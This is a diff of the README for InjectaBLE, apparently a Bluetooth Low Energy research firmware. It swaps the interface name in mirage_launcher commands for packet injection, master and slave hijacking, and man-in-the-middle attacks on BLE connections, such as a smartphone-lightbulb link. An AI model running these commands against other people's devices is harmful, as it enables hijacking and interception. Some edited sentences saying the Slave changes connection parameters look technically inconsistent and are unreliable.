RCayre/injectable-firmware/README.md

 1) Save this scenario as **injection_lightbulb.py** in the *scenarios* folder.
 2) Run the **ble_sniff** module with the following parameters:
 ```
-sudo ./mirage_launcher ble_sniff SNIFFING_MODE=newConnections SCENARIO=injection_lightbulb INTERFACE=salto0
+sudo ./mirage_launcher ble_sniff SNIFFING_MODE=newConnections SCENARIO=injection_lightbulb INTERFACE=butterfly0
 ```

 3) Establish the connection between the smartphone and the lightbulb: when you are synchronized with the connection, you can simply inject the previously mentioned packets by pressing up or down arrows keys.

 ## Hijacking the master role (experimental)
-InjectaBLE allows to perform master hijacking attacks by injecting a LL\_CONNECTION\_UPDATE\_IND packet and synchronize with the Slave when the Master changes its connection parameters.
+InjectaBLE allows to perform master hijacking attacks by injecting a LL\_CONNECTION\_UPDATE\_IND packet and synchronize with the Slave when the Slave changes its connection parameters.
 You can perform this kind of attacks using **ble_hijack** module:
 ```
-sudo ./mirage_launcher "ble_hijack|ble_master" ble_hijack1.INTERFACE=salto0 ble_hijack1.ROLE=master
+sudo ./mirage_launcher "ble_hijack|ble_master" ble_hijack1.INTERFACE=butterfly0 ble_hijack1.ROLE=master
 ```

 ## Hijacking the slave role (experimental)
 InjectaBLE allows to perform slave hijacking attacks by injecting a LL\_TERMINATE\_IND packet and synchronize with the Master when the Slave disconnects.
 You can perform this kind of attacks using **ble_hijack** module:
 ```
-sudo ./mirage_launcher "ble_hijack|ble_slave" ble_hijack1.INTERFACE=salto0 ble_hijack1.ROLE=slave
+sudo ./mirage_launcher "ble_hijack|ble_slave" ble_hijack1.INTERFACE=butterfly0 ble_hijack1.ROLE=slave
 ```

 ## Performing a MiTM attack (experimental)
-InjectaBLE allows to perform MiTM attacks by injecting a LL\_CONNECTION\_UPDATE\_IND packet and synchronize with both legitimate devices when the Master changes its connection parameters.
+InjectaBLE allows to perform MiTM attacks by injecting a LL\_CONNECTION\_UPDATE\_IND packet and synchronize with both legitimate devices when the Slave changes its connection parameters.
 You can perform this kind of attacks using **ble_mitm** module:
 ```
-sudo ./mirage_launcher ble_mitm INTERFACE=salto0 MITM_STRATEGY=injection
+sudo ./mirage_launcher ble_mitm INTERFACE=butterfly0 MITM_STRATEGY=injection
 ```